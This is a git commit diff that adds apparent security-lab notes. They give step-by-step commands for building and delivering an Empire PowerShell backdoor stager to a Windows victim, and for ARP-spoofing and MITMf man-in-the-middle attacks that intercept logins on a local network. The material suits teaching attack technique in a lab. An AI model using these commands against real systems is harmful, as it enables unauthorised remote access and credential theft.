This commit is contained in:
Frank Xu
2018-12-01 23:43:58 -05:00
parent 12c103ac48
commit bac3262959
8 changed files with 62 additions and 0 deletions

View File

@@ -0,0 +1,42 @@
mkdir /var/www/html/empire_backdoor/
mkdir empire_lab
cd empire_lab
git clone https://github.com/EmpireProject/Empire.git
cd Empire/setup
./install.sh
cd ..exit
./empire
//create a listener
listeners
(optional) uselistener back<tab><tab>
uselistener http
(optional) info
set Port 8081
set Host http:://10.0.2.10:8081
execute
back
list //list listener
//create a backdoor for Windows, we need to know how to communicate with Windows Powershell securly (stager)
back //back to top level
//(optional): usestager
usestager windows/launcher_bat
set Listener http
set OutFile /var/www/html/empire_backdoor/emipire_http_8081.bat
execute
Victim download the backdoor payload from the website (Window machine)
service apache2 start (Kali start the website)
(Window 10: open IE)
10.0.2.7/empire_backdoor
(click the rev_https_8080.exe and run anyway)
//Access to victim's computer
agents
interact <name of the victim's computer>
sysinfo

View File

@@ -0,0 +1,8 @@
arp -a //router's ip
echo 1 > /proc/sys/net/ipv4/ip_forward //forward victim's request to router
arpspoof -i eth0 -t 10.0.2.1 10.0.2.15 //attacker tells router that I am the victim
arpspoof -i eth0 -t 10.0.2.15 10.0.2.1 //ttacker tells victim that I am the router
https://www.irongeek.com/i.php?page=security/arpspoof
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

View File

@@ -0,0 +1,12 @@
arp -a //router's ip
//install mitmf
apt-get update
apt-get install mitmf -y
//attack
mitmf --arp --spoof --gateway 10.0.2.1 --target 10.0.2.15 -i eth0 -hsts
//Website
http://www.stealmylogin.com/demo.html
http://w3schools.invisionzone.com/